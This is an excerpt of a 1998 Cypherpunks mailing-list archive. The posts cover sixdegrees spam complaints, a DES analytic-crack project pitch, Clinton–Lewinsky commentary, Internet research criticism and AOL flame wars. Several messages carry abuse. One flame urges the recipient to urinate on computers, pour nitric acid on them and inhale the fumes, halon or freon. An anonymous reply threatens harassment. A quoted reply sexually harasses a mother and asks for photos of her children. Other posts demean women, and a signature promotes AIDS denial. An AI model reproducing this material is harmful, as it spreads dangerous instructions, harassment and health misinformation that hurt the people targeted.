On Mon, 14 Sep 1998, sixdegrees wrote:

> 
> Just a quick update from sixdegrees(tm). Unfortunately Larry 
> Gilbert (irving@pobox.com) asked not to be listed as your 
> contact with sixdegrees.
> 
> We also wanted to make sure you were aware that you currently 
> have no other confirmed contacts, so it will be hard for you to
> have a productive sixdegrees experience. As you probably know, 
> without any confirmed contacts, you won't get any results from our 
> networking searches. 
> 
> So, we just wanted to recommend that you head over to 
> http://www.sixdegrees.com , log-in, and go to MY CONTACTS 
> to list additional relationships. 
> 
> 
> ====================================================================
> PLEASE NOTE: All replies to this address are processed by a computer.
> If you have any problems, questions or requests send an e-mail to 
> issues@sixdegrees.com and someone will get back to you as soon as 
> possible.
> ====================================================================

Since you seem so intent on continuing to spam the Cypherpunks list like
some AOL luser-wannabe, I have a better idea. Follow this procedure
exactly to reach enlightenment: 

1) Open the cases for all your computers.
2) Drop your pants.
3) Whip it out. In the case of a woman, just squat.
4) Spray all your machines.
5) If any machines are still working, pour large amounts of concentrated
nitric acid solution on them. Inhale the resulting vapors.
6) Close the door, activate the halon system, sit down, and inhale deeply.
7) You will pass out. Within a few minutes, you will see the Grand Poobah
himself.
8) If you do not have a halon system, inhale heavy gasses such as freon.

We're glad to be of service to clueless AOLholes and clueless
AOLhole-wannabes everywhere. Have a nice day.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@base.xs4all.nl>
Date: Mon, 14 Sep 1998 17:10:46 +0800
To: cypherpunks@toad.com
Subject: Is nym.alas.net down?
Message-ID: <2f1b7f6c4bcb1557a6c4409be67a9c36@base.xs4all.nl>
MIME-Version: 1.0
Content-Type: text/plain



Is nym.alias.net down? I've sent a request twice using
a different remailer chain each time yet it still doesn't
reply. It's been about two days since I sent it in.

I did however create a nym with dongco.hyperreal.art.pl.
Is this service reliable? or will it disppear quickly?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Tue, 15 Sep 1998 02:13:53 +0800
To: cypherpunks@cyberpass.net
Subject: Fwd: WHITE HOUSE MULLS NEW INTERNET TAX PROPOSAL  from edupage
Message-ID: <3.0.5.32.19980915001432.008abb40@idiom.com>
MIME-Version: 1.0
Content-Type: text/plain



Forwarded from Dave Farber's List
-----------------------------------
I think the something at the WH has pushed them off the edge. How much you want to bet that it gives a lot more information than just the item costs. It will be used to police obscenity laws and censorship laws before it is done.

Dave


Ira Magaziner, President Clinton's senior Internet advisor, has proposed a 
new plan for tracking and taxing goods sold over the Internet that would use 
electronic "resident cards" and private-sector escrow agents around the 
world. Consumers would obtain digital cash at banks that would allow 
merchants to identify which country the buyer is in, but would reveal no 
other personal information. Consumption taxes would then be calculated, 
collected, and placed with an escrow agent who would then funnel the money 
to the appropriate government. "Governments would get their money more 
quickly... they would get a higher compliance rate... and the system would 
be easier to police," says Mr. Magaziner. (Wall Street Journal 11 Sep 98)

==================================


				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Cordian <emc@wire.insync.net>
Date: Tue, 15 Sep 1998 00:18:56 +0800
To: cypherpunks@cyberpass.net
Subject: The DES Analytic Crack Project
Message-ID: <199809150520.AAA13045@wire.insync.net>
MIME-Version: 1.0
Content-Type: text/plain



As some of you may have noticed, a new attempt to crack the Data
Encryption Standard has been started, with a descriptive FAQ located
at the following URL
 
        http://www.cyberspace.org/~enoch/crakfaq.html
 
A while back, after the first DES challenge was announced, a number of
us made the observation that a known plaintext attack on DES,
expressed as a system of a few thousand boolean variables with
constraints in 3-conjunctive normal form, was not too far from the
size and complexity of problems that could be directly solved by
bleeding edge combinatorial algorithms, albeit with signficant CPU and
memory consumption.
 
We thought this would be an interesting result, and generated a number
of problems of various numbers of DES rounds based on the DES
Challenge data, and some not particularly optimized S-Box
representations, and set about the task of solving them, smaller
problems first.  We wrote a lot of code, learned a lot about arbitrary
systems of boolean variables, and after breaking 2-round and 4-round
problems, the first almost instantly, and the second with very
reasonable amounts of resources, set about the task of seeing if we
could break the higher round problems, and immortalize ourselves by
beating DESCHALL to the key.
 
To our very great regret, we did not manage to do this, and once the
$10k prize was claimed, we figured the game was over and returned to
working on other things.  We still thought DES was a problem of
approximately the right size to demonstrate the existence of an
analytical solution which would beat a well-tuned exhaustive search on
a problem of practical interest.
 
Since that time, DES has been broken twice more by exhaustive search,
once by distributed.net, and again by a hardware DES cracking machine
designed by Net legend John Gilmore and the EFF for a non-trivial
amount of money.
 
Remarkably, although most agree DES is dead for new applications, with
Moore's Law and additional hardware crackers being possible today for
much less than the cost of the prototype, it still seems to enjoy a
reputation amongst the public as a cipher that takes 20,000 pentiums
running for half a month or a hardware box with $100k of chips running
for several days to break, neither of which seems to have thrown the
Fear of God into its current users, most notably the Banking Industry.
 
With other analytic attacks like differential and linear cryptanalysis
being really practical only for reduced round DES, and all current
high-profile cracks on production ciphers employing key trial, the
press has latched onto keysize as a synonym for strength, and has made
numerous statements which have reinforced this questionable paradigm
in the minds of the public.
 
We have therefore been taking another look at our idea of a
combinatorial crack of DES, and decided that even with DES having been
cracked three times by key trial, it is definitely a project worth
doing.  This time, rather than working frantically in an unsuccessful
attempt to beat other teams on a public challenge, we wish to finish
up our original efforts, and repeat the three cracks previously done,
this time using our algorithms, and distribute working code
continuously as the project progresses, to sponsors who have donated
some money to defray our costs.  This will offer people the
opportunity to participate vicariously in a fun project which has the
potential to be a genuine paradigm shift in the way the world thinks
about codebreaking.
 
Sometimes, promising areas of research are not followed because of
knowlege of some well-known result which suggests that such
exploration will be unfruitful.  Years ago, for instance, suggestions
that programs could be checked by software for proper behavior, and
run without using protected memory regions, were usually met with
snide comments about the "computer halting problem" and various
adjunct results.  Today, there are many variants of "safe execution"
technology, from prove and carry schemes, to Java bytecode, with a
sound theoretical basis behind them.  None of these is a violation of
the "computer halting problem" results, of course.
 
Similarly, after a large burst of activity decades ago, which resulted
in the notion of NP-Completeness, and various results in computational
complexity theory, suggestions that an analytic solution exists for
some large combinatorial problem of practical interest conjure up
visions of exponential resource utilization, speaker cluenessless, and
the lack of progress on NP=P.
 
For this reason, we feel this project is definitely a Schnelling
Point.  If it works, even badly, people will begin to look at lots of
problems in ways they would not have considered before, and much new
code which improves upon what we have done will be created.  This will
be an irreversible change in the Order of Things.
 
In the several days since we put up our FAQ, we have gotten quite a
few comments, and some concerns.
 
The comments have mostly been along the lines that it is an
interesting, even intriguing project.  The concerns are generally that
we will experience an unexpected "combinatoric explosion" in the
higher round problems, and that no one in their right mind would send
money to a nym, because it might just vanish and be used by the nym to
live in perpetual ecstasy in some place warm and tropical, without the
possiblility of the nym being sued for fraud.
 
We hope the close coupling between the sponsors and the project
members will eliminate this latter concern, with weekly progress
reports and working code being distributed to permit the sponsors to
reproduce our results as they occur.  If three people are willing to
sponsor and give us the go-ahead to begin, without wanting their money
back if other sponsors do not join, we can probably get through the
minimal S-Box representations and their proof-of-correctness as well
as some cleaned up code for the 2-round problem.  Hopefully we will
then have a reputation with these people which will encourage others
to join in the effort.
 
Clearly, we're after speculative capital, rather than widow and orphan
money, and hope a few of the wealthy older retired (and perhaps even
crusty) engineer types might find this a productive thing to support.
After all, if you've just blown $220,000 on a DES Cracker, making it
$220,500 and getting your very own Schnelling Point in return is
probably a reasonable amount of fun for your money.
 
I'll stop ranting now. :)

--
Sponsor the DES Analytic Crack Project
http://www.cyberspace.org/~enoch/crakfaq.html
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@hun.org>
Date: Mon, 14 Sep 1998 19:45:59 +0800
To: "Lynne L. Harrison" <declan@well.com>
Subject: Re: Clinton--Why I am Chortling (fwd)
In-Reply-To: <3.0.5.32.19980914122452.0086a750@pop.mhv.net>
Message-ID: <Pine.BSF.3.96.980914212454.6754C-100000@hun.org>
MIME-Version: 1.0
Content-Type: text/plain



,,,...On Mon, 14 Sep 1998, Lynne L. Harrison wrote:

>
>I don't see a power imbalance here.  If a young woman in her 20's
>invitingly flashes her thong panties at a man, I don't see how she can be
>portrayed as the victim.  The only way that the issue of power arises is
>that Monica was not overwhelmed by someone in power - she was attracted to
>the power.
>
    I suspect _you_ can handle the power imbalance. Monica is not exactly
    what I would call a collected, stable example of the female species.

    she was scrambled from her parents divorce, was anxious to be both
    liked and approved, and she told the high school teacher she had
    been babysitter for _and_ rolling (sounds like a Kennedy doesn't it)
    that she was in Washington earning her "knee pads" with Clinton.  

    now, that's an unstable freak who is attracted to father figures 
    (Electra complex, if you will) and absolute power over her.

    I dont think as a woman you can understand the fear a male boss
    feels; even if there is a genuine love interest, you crap in your
    own hat, it will be served up to you some day. or as it is sometimes
    stated: "...dont get your meat where you earn your bread...."

    it doesnt matter whether Monica hiked her dress, or Clinton dropped
    his trou (which is more likely given his track record)

    even if Monica was "a willing, consenting adult", any man in a
    position of power who takes advantage of a star-struck female
    30 years his junior is guilty of an abuse of power (personal) and
    in this case using the position of "The President of the United
    States" as his instrument of power --end of story.
    
    to be a "consensual act", the woman certainly needs to not be
    an emotional disaster --and not be preyed upon by a raging
    psychopath who has no more common sense than a drunken fraternity
    brat who says: "Hi, my name is Bill Clinton, let's fuck!"

>On another but connected note, explain why Monica saved that dress!  I
>found this little tidbit to be the "yuck" factor...
>
    she's sick...  simple as that. apparently she was not exactly
    monogamous; 

    probably saved used prophylactics from the rest of them. 
>
>
    note one of her last snivels to Clinton was that she wanted 
    to do the "horizontal bop" --just once. 

    the whole thing is sick.

    stupid Americans only vote with their wallet.

    the American bread and circus mentality does not care... 

    if the economy had already fallen, they would howl Clinton out of
    office faster than a school principal accused by some mother who 
    misunderstood her 5 year old.

    however, leave the scurrilous bag of camel dung in office; the
    government bogged down and consumed with its own evil is a 
    government which is too preoccupied to maximize the damage they
    are doing to the country and the world. maybe they will leave
    us alone.

    like I said before: leave Clinton alone --Al Bore is worse; and,
    I'll even put up with the bitch over Tipper.

__________________________________________________________________________

    To be a ruler of men, you need at least 12 inches....
_________________________________________________________________ attila__











From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@hun.org>
Date: Mon, 14 Sep 1998 19:50:28 +0800
To: cypherpunks <cypherpunks@toad.com>
Subject: Clinton still doesnt get it
Message-ID: <Pine.BSF.3.96.980915003703.7119C-100000@hun.org>
MIME-Version: 1.0
Content-Type: text/plain




    25 years of Clinton's raging pscyhopathic, oversexed behavior:
    Hillary has been a willing partner.

    nothing but control freaques and obscene power trippers. there
    is only amorality in that house --and power by any means.

New York Times
September 13, 1998 
IN AMERICA/By BOB HERBERT 
Still Doesn't Get It 

David Maraniss, in his biography of Bill Clinton, "First in His Class," 
writes about an "intense relationship" that Mr. Clinton had with a 
young woman who had volunteered to work in his first campaign for 
public office. Mr. Clinton was running for Congress and the woman was a 
student at the University of Arkansas. 

A campaign aide, quoted in the book, said, "The staff tried to ignore it as 
long as it didn't interfere with the campaign." But it did interfere, because 
Mr. Clinton was also intensely involved with Hillary Rodham. 

Mr. Maraniss writes: "The tension at campaign headquarters increased 
considerably when Rodham arrived as people there tried to deal with the 
situation. Both women seemed on edge. The Arkansas girlfriend would ask 
people about Hillary: what she was like, and whether Clinton was going to 
marry her. When she was at headquarters, someone would sneak her out 
the back door if Rodham was spotted pulling into the driveway." 

It was all there more than two decades ago at the very beginning of Bill 
Clinton's political journey: the thoughtlessness, the recklessness, the 
wanton use of friends and associates to cover up his ugly behavior, the 
willingness to jeopardize the hopes and dreams of people who were 
working for him and trusted him, the betrayal of those closest to him. 

There is nothing new in Kenneth Starr's report, just confirmation in 
extreme and at times lurid detail of the type of person Mr. Clinton has 
always been. 

In 1992, when he was running for President and people across the nation 
were investing their time, money and even their careers in him, he 
rewarded them with the Gennifer Flowers scandal. He carried his 
psychodrama onto national television when he went on "60 Minutes" and, 
with Mrs. Clinton at his side, called Ms. Flowers a liar. 

He told Steve Kroft and 30 million viewers: "It was only when money came 
up, when the tabloid went down there offering people money to say that 
they had been involved with me, that she changed her story. There's a 
recession on, times are tough, and I think you can expect more and more 
of these stories as long as they're down there handing out money." 

In other words, it was the economy, stupid. 

But even as he was denying that he had had a sexual relationship with 
Gennifer Flowers, Mr. Clinton was going out of his way on "60 Minutes" to 
convey to the public that he had learned a lesson, that he had matured 
and that his irresponsible behavior would not be a problem if he were 
elected President. 

"I have absolutely leveled with the American people," he said. 

In fact, his comments were about as level as the Himalayas. We now know 
that he was willing to risk everything, his family, his Presidency, the 
welfare of the nation, on a dangerous fling with a White House intern. For 
him, it must have been great fun. He got to play so many people for fools. 
He got to chat on the phone with Congressmen while engaging in sex. He 
got to play hide and seek with the Secret Service. 

Very mature behavior. 

Now the Clinton psychodrama has much of the Government paralyzed 
and the Democratic Party in a state of panic. But Mr. Clinton still doesn't 
get it. On Thursday he met with the members of his Cabinet, who had 
been duped and lied to like so many others. He went into his emotional 
routine and said he was oh-so-sorry, etc. He begged for forgiveness. 

But he got upset when the Secretary of Health and Human Services, 
Donna Shalala, said that she was appalled by his behavior. Ms. Shalala 
complained that the President seemed to believe that pursuing his 
policies and programs was more important than providing moral 
leadership. 

A story in The Washington Post said Mr. Clinton responded sharply to Ms. 
Shalala, rebuking her. My understanding is that his response was critical 
but not harsh. Either way, it's clear that Mr. Clinton has not learned the 
requisite lessons. He lied to Ms. Shalala months ago and sent her out to lie 
to the public, and now he's criticizing her. The President is not sorry. He's 
apologizing because there's a gun at his head. He's not changing what he 
now describes as his sinful ways. He's trying to manipulate public opinion 
so he can survive to sin again. The psychodrama remains as long as he 
remains. 

There are no surprises here. With Bill Clinton, it was ever thus. 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: HyperReal-Anon <nobody@sind.hyperreal.art.pl>
Date: Mon, 14 Sep 1998 19:51:21 +0800
To: cypherpunks@toad.com
Subject: Re: Hi!
Message-ID: <1de8e2f402710b06525c5f67b59f70bb@anonymous>
MIME-Version: 1.0
Content-Type: text/plain



On Mon, 14 Sep 1998 harald.fragner@idg.se wrote:

> 
> Do I know you?
> 
> Harald
> 
> ------------------
> Harald Fragner
> IT-avdelningen, IDG
> Tel: 08-453 60 10
> Fax: 08-453 60 05
> Email: harald.fragner@idg.se
> 
> 

No, but we know you! You're a very evil man, Mr. Fragner, at least by the
standards of the Hired Government Ninjas. Under our standards, everyone is
evil...except government leaders.

Expect black helicopters to be targetting your house in the next few days. 
Do not be surprised if unguided rockets are shot into it. If ninjas are
coming through your windows at 2AM, just remember: We're from the
government and we're here to help you. Just bend over and grip the towel
rack.

Your phone will be ringing off the hook in the middle of the night for the
next two or three years. 

Oh, wait, maybe I'm looking into the future again. I really must stop
doing that. That's the bad part about being involved with the Hired
Government Ninjas. We mysteriously know how people will be harassed before
it happens. Imagine that. 

Sincerely,

Hired Government Ninjas, Inc.
Remember, our motto is: "Do what we say, that's the way we kick it."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@hun.org>
Date: Mon, 14 Sep 1998 19:56:02 +0800
To: cypherpunks <cypherpunks@toad.com>
Subject: a few facts on Presidential peccadillos (fwd)
Message-ID: <Pine.BSF.3.96.980915004649.7119D-100000@hun.org>
MIME-Version: 1.0
Content-Type: text/plain




    power trippers attract willing victims.

    enjoy...
__________________________________________________________________________

1. Which president smoked marijuana with a nude playgirl while he joked
about being too wasted to "push the button" in case of nuclear attack?

2. Which president allegedly had affairs with both a winner AND a
finalist in the Miss America pageant?

3. Which president had sex with one of his secretaries stretched out
atop a desk in the oval office?

4. Which president allegedly had an affair (as well as children) with a
slave who was his wife's half sister?

5. Which president called his mistress "Pookie"?

6. Which president married a woman who hadn't yet divorced her first
husband, and was branded an "adulterer" during his re-election campaign?

7. Which future president wrote love letters to his neighbor's wife
while he was engaged to someone else?

8. Which president had a torrid affair with the first lady's personal
secretary?

9. Which president had sex with a young woman in a White House coat
closet - at one point, while a secret service agent prevented the
hysterical first lady from attacking them?

10. Which president had sex in a closet while telling his partner about
the *other* president who did the same in a closet? (The one from
Question 9)?

11. Which vice president was ticked off because he felt that HIS record
of sexual conquests was much more "impressive" (i.e. numerous) than the
President's?

12. Which future president, while a college student, enjoyed showing off
his penis (which he named Jumbo)?


ANSWERS

1.  John F. Kennedy
2.  Bill Clinton
3.  Lyndon B. Johnson
4.  Thomas Jefferson
5.  Bill Clinton
6.  Andrew Jackson
7.  Lyndon B. Johnson
8.  Franklin D. Roosevelt, John F. Kennedy
9.  Warren G. Harding
10. John F. Kennedy
11. Lyndon B. Johnson
12. Lyndon B. Johnson





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Mon, 14 Sep 1998 21:35:53 +0800
To: cypherpunks@toad.com
Subject: Re: Larry Gilbert, AOLers, and the Hyper-real flamer
Message-ID: <199809150228.EAA19097@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



On Mon, 14 Sep 1998, Paul H. Merrill wrote:

> 
> I love this to death.  Some asshole sends crap data to sixdegrees
> including dredged up real email addresses, then when sixdegrees and the
> contacts given react in a totally appropriate manner other (?) assholes
> berate them for living.  And this one even manages to toss in an
> anti-AOL rant where AOL plays no part.
> 
> Such witticisms I haven't seen since my kids turned 7.
> 
> PHM

I know of several people in addition to myself who have complained to
Sixdegrees about this. I've personally given up sending complaints back to
them, and I lost count at 5. Sixdegrees simply ignores them. I've sent
them to their upstream sites, and they either ignore them or tell me that
they've forwarded them to Sixdegrees. My complaints, at least, were very
civil. One explained exactly what a mailing list was, for crying out loud. 
I can't speak for Hyper-real's (if he sent any) and the others. You may be
able to use that defense if Sixdegrees didn't know, but they do. 

Sixdegrees could avoid these problems very easily by adding a domain
verification so that somebody from Netcom can't specify some address at
toad.com and have it work. They haven't. They haven't because they don't
care. Saying that some sites have screwed up rDNS and mail domains isn't a
valid excuse. They can insert exemptions for Hotmail, MSN, Juno, and other
sites like that if they want. Oh, maybe they have a "phobia" of this, just
like AOLers apparently have a "phobia" of even making an attempt to use
English properly, so it's okay. 

I don't think the parallel between the AOL users spamming the list and
organizations like Sixdegrees spamming the list is that uncalled for
either. Maybe you find any drawing of parallels offensive, Paul, and maybe
you'll denounce it as "propoganda" because I might use an example in this
message, and maybe you just really like AOL and think its cluelessness and
broken software is the best thing since sliced bread, but that doesn't
change the fact that Sixdegrees and friends are doing the same thing AOL
is and that it's abuse of the network. They fire a salvo, and somebody
else fires one back at their expense.

By this logic, I'd next expect to read a claim that since the AOLers are
getting the Cypherpunks address from somewhere, we should welcome their
requests for band stickers and things like "how u do that." After all,
they're the victims, and are probably the kind of people who go to look up
the word "gullible" when somebody tells them it isn't in the dictionary.

It's a long-established tradition to flame people like this. Some flames
are better than others. Maybe if the Hyper-real user insults them enough
they'll finally add Cypherpunks to their block list. 

I've personally grown real sick of seeing bullshit passwords, welcome
messages, new password messages, updates, and other junk on this list from
sites which don't bother to verify domain names. I can give them that, but
I start to get pissed when they refuse to block the address. For that
reason I don't mind the person or persons who are flaming these idiots and
in fact, like Mr. May, I cheer them on. Personally, I *WANT* them to pour
nitric acid into their computers to destroy them, so they get the hell off
the net. 

Maybe they're scared of block lists. After all, they're similar to kill
files which we all know are lists of people who need killing and since
murder is illegal and immoral kill files must be too.

Paul, maybe you don't mind somebody pouring grass killer on your lawn if
they were submitted your address over the phone and made an "honest"
mistake and fell victim to a prank, but I mind if they do it to mine,
particularly since all they have to do is perform cursory checks to
realize it's suspect. Oops, I made an example using a different subject
matter. We're in the "blatant propoganda" stage now, I suppose. 

Now, since you're all for niceness in the world, you can go jump on Tim
since he's doing this too.

  From: Tim May <tcmay@got.net>
  To: Well now I am a Mommy! <xenedra@hotmail.com>, cypherpunks@toad.com
  Subject: Re: sixdegrees

  At 6:27 PM -0700 9/13/98, Well now I am a Mommy! wrote:
  >hi,
  >
  >I see you added me as a friend..... just wondering who you are.  :)
  >
  >Christy
  >

  Hi Christy,

  Got your name from the Stalker's R Us group. Please post more details
  about your personal fantasies. Send us nude pictures, too. 

  You say you're a Mommy. Hope there are no stretch marks.

  Oh, and your children can join our group too. Got any photos?

  --Tim May

And:

  From: Tim May <tcmay@got.net>
  Subject: Re: News for class

  At 5:58 AM -0700 8/30/98, sboyd wrote:
  >Please inform me how I can get the news each day by e-mail at
  >flashboyd@aol.com.  This information will be used in my comm class.


  Hey, "flashboyd@aol.com," why are you asking _us_?

  According to AOL, "AOL _is_ the Internet."

  (Personally, I'm cheered by the news that a net.stalker is tracking down
  clueless AOLers and Webbers and eviscerating them.)

  --Tim May

SignalMonger




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Tue, 15 Sep 1998 08:42:13 +0800
To: "Lynne L. Harrison" <cypherpunks@Algebra.COM
Subject: Re: Clinton--Why I am Chortling
In-Reply-To: <Pine.GSO.3.95.980914063037.25313E-100000@well.com>
Message-ID: <199809151339.GAA02542@proxy4.ba.best.com>
MIME-Version: 1.0
Content-Type: text/plain



    --
At 12:24 PM 9/14/98 -0400, Lynne L. Harrison wrote:
> I don't see a power imbalance here.  If a young woman in 
> her 20's invitingly flashes her thong panties at a man, I 
> don't see how she can be portrayed as the victim.  

According to the law applied to normal people, Monica was the
victim.  Also according to the law applied to normal people,
Clinton was required to spill his guts about all of his sex
life, because some women sued him, whereas the women suing
was completely protected against any questions concerning her
sex life.

These laws are flagrantly unjust, but the Democrats introduced
them and applied them.  Feminists supported and continue to
support Clinton precisely because he supported and supports
laws that he flagrantly broke.  If these laws are to be
repealed for politicians, they should be repealed for normal
people as well.

    --digsig
         James A. Donald
     6YeGpsZR+nOTh/cGwvITnSR3TdzclVpR0+pr3YYQdkG
     Bx5t8xgN8K1uoUuifbh23snXHu5I2qNBvzwQk6pb
     4qwHCwWse7ErTTfZyYyUUnpKfLU8yjt0ak2jmSKBA
-----------------------------------------------------
We have the right to defend ourselves and our property, because 
of the kind of animals that we are. True law derives from this 
right, not from the arbitrary power of the omnipotent state.


http://www.jim.com/jamesd/      James A. Donald




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Tue, 15 Sep 1998 06:30:26 +0800
To: cypherpunks@cyberpass.net
Subject: IP: Critics Pick Apart Study on Internet and Depression
Message-ID: <v04011709b223fadaedc9@[139.167.130.246]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


Delivered-To: ignition-point@majordomo.pobox.com
X-Sender: believer@telepath.com
Date: Mon, 14 Sep 1998 21:18:32 -0500
To: believer@telepath.com
From: believer@telepath.com
Subject: IP: Critics Pick Apart Study on Internet and Depression
Mime-Version: 1.0
Sender: owner-ignition-point@majordomo.pobox.com
Precedence: list
Reply-To: believer@telepath.com

Source:  New York Times
http://www.nytimes.com/library/tech/98/09/biztech/articles/14digicom.html

September 14, 1998

TECHNOLOGY COLUMN

Critics Pick Apart Study on Internet and Depression

By DENISE CARUSO

Robert Kraut, co-author of a new study linking depression with Internet
use, sounded a bit depressed himself last week.

"I thought I was finished with this," Kraut, a professor of social
psychology and human-computer interaction at Carnegie Mellon University,
said with a sigh. He was alluding to the flood of attention -- and
criticism -- that his study, titled "Home Net," had received since it was
published two weeks ago.

Starting in 1995, "Home Net" researchers gave PCs and free Internet
accounts to 169 people in 73 families in the Pittsburgh area. After
monitoring their online behavior, in some cases for more than two years,
the researchers concluded that spending time on the Internet was associated
with statistically significant increases in depression and loneliness.

Critics assert that the study has fatal flaws that neutralize its findings
and that they are appalled at the authors' far-reaching conclusions about
the impact the findings might have on Internet policy and technology
development.

Donna Hoffman, a Vanderbilt University professor and outspoken critic of
Internet research design, was unequivocal about the "Home Net" study.

"Speaking as an editor, if this had crossed my desk, I would have rejected
it," said Ms. Hoffman, who edits the journal Marketing Science. "The
mistakes are so bad that they render the results fairly close to
meaningless."

Among those mistakes, she said, were the absence of two standard
safeguards: a control group and random selection of subjects.

"With 'Home Net,' we don't know for sure what led to their results," Ms.
Hoffman said of the lack of a control group, "because we don't know what
happened to people who weren't using the Internet."

In addition, the study recruited people from high schools and community
service organizations, instead of selecting people randomly from a large
area. Random selection is crucial to building a truly representative sample
of a population -- in this case, residents of the United States.

The study found that one hour a week online led to small but measurable
increases in depression and loneliness and loss of friendships. While those
measurements might well be statistically significant, critics assert that
without a random sample, they are meaningless outside the group that was
studied.

"The assertions have no statistical relevance to any population of Internet
users beyond those in the study population -- even in principle," declared
Charles Brownstein, a former director at the National Science Foundation,
now an executive director at the Corporation for National Research
Initiatives in Reston, Va.

Although research studies do not always have to use control groups or
randomly chosen participants to be valid, Ms. Hoffman said, those
safeguards become imperative "when you're doing a study that claims causal
relationships and that these relationships hold in the larger population."

The "Home Net" team clearly made such claims. For example, the news release
stated that "Carnegie Mellon Study Reveals Negative Potential of Heavy
Internet Use on Emotional Well Being," and even suggested that
parents move PCs out of teen-agers' bedrooms and into shared family rooms.

Kraut was quoted extensively in the release, with such statements as, "We
were surprised to find that what is a social technology has such
anti-social consequences." Also: "Our results have clear implications for
further research on personal Internet use. As we understand the reasons for
the declines in social involvement, there will be implications for social
policies and for the design of Internet technology."

Last week, Kraut wearily defended his study. "In 1995, we did start with a
control group, but it was very hard to keep it, with little in the way of
incentives for them to continue to fill out questionnaires," he said. "And
we couldn't use a random sample because of the nature of the study's design
-- we wanted to be able to include groups who already had social
connections with each other so we could observe some shifting, if it was
going to occur, between existing social relationships."

And despite criticism of the researchers' methods, he said that the study
was widely applicable.

"We have changes big enough that they aren't likely to have occurred on the
basis of chance," Kraut said. "There is something here to explain."

But critics like Ms. Hoffman look askance at such results, given her
experience debunking other Internet studies, including one from Neilsen
Media Research in which she participated in 1996 and another in 1995 in
which Marty Rimm, a graduate student in Carnegie Mellon's College of
Engineering, published a study purporting to show that the Internet was
overrun with pornography.

The impact of Rimm's study, though based on false premises and quickly
discredited, was profound. The resulting furor in the media and in Congress
helped bring about the Communications Decency Act, which the Supreme Court
ruled was a violation of the First Amendment.  Critics fear that the "Home
Net" study might end up having a similar effect.

"It's easy to imagine the results of this study being used to influence
policy decisions about Internet access, especially in controversial funding
decisions for schools and libraries," Ms. Hoffman said.

But in the end, Ms. Hoffman said, protecting the Internet itself is not the
point.

"We're trying to protect the standard of research," she said. "This isn't
obscure ivory-tower stuff that never sees the light of day. It has an
impact on people's lives. If we're going to the trouble to study the
Internet, at least we should make sure we're doing it right."

 Copyright 1998 The New York Times Company
-----------------------
NOTE: In accordance with Title 17 U.S.C. section 107, this material is
distributed without profit or payment to those who have expressed a prior
interest in receiving this information for non-profit research and
educational purposes only. For more information go to:
http://www.law.cornell.edu/uscode/17/107.shtml
-----------------------




**********************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address
**********************************************
www.telepath.com/believer
**********************************************

--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Edwin E. Smith" <edsmith@IntNet.net>
Date: Tue, 15 Sep 1998 07:21:11 +0800
To: TM <messiah@jps.net>
Subject: Re: Joe Farah 9/14 (Pppbbbttt)
In-Reply-To: <3.0.2.32.19980914230008.007fb830@mailhost.IntNet.net>
Message-ID: <3.0.2.32.19980915080355.007f52a0@mailhost.IntNet.net>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Thank you for your comments. Now you can go back to reading Marx.

Edwin
-----BEGIN PGP SIGNATURE-----
Version: PGP for Personal Privacy 5.0
Charset: noconv

iQA/AwUBNf5XqkmNf6b56PAtEQKlXwCfQX0DbpcjXrXl9UkxAIASKkfoAd8AoKRm
2rlzasDKGgnw+GiE2Cy1HuC+
=iz6y
-----END PGP SIGNATURE-----


When freedom is outlawed.......Only outlaws will be free!

If cryptography is outlawed, pomz pvumbxt xjmm ibwf dszquphsbqiz.

Fun! Fast! Revealing! Try "The World's Smallest Political Quiz" at:
   http://www.self-gov.org/quiz.html

IS AIDS A GOVERNMENT/DRUG COMPANY HOAX?
   http://www.virusmyth.com/aids/index.htm

When you blame others, you give up your power to change.
Dr. Robert Anthony

Libertarian Party of Hillsborough County, FL
   http://home.tampabay.rr.com/lphc

When a place gets crowded enough to require ID's, social collapse is not far
away. It is time to go elsewhere. The best thing about space travel is that
it made it possible to go elsewhere.

Lazarus Long




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: AIMSX@aol.com
Date: Tue, 15 Sep 1998 07:16:32 +0800
To: cypherpunks@toad.com
Subject: Re: Larry Gilbert, AOLers, and the Hyper-real flamer
Message-ID: <33ec7cbb.35fe5849@aol.com>
MIME-Version: 1.0
Content-Type: text/plain



Obviously you have a very high opinion of yourself and a low opinion of people
who use AOL.  Contrary to popular belief, there are a few intelligent people
on AOL, but it looks as if you are too egotistical to realize that.

Have you ever thought to look at your own mistakes before you publicize
everyone else's to the world?  Are you just suffering from some sort of
dillusion of grandeur - thinking you are better than everyone else.  Things
like this are what many wars were started over, I am so happy the internet
(hopefully) won't start a war in the real world.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Motyka <mmotyka@lsil.com>
Date: Tue, 15 Sep 1998 10:46:43 +0800
To: cypherpunks@toad.com
Subject: Re: DoD on Crypto, Echelon, Secrets
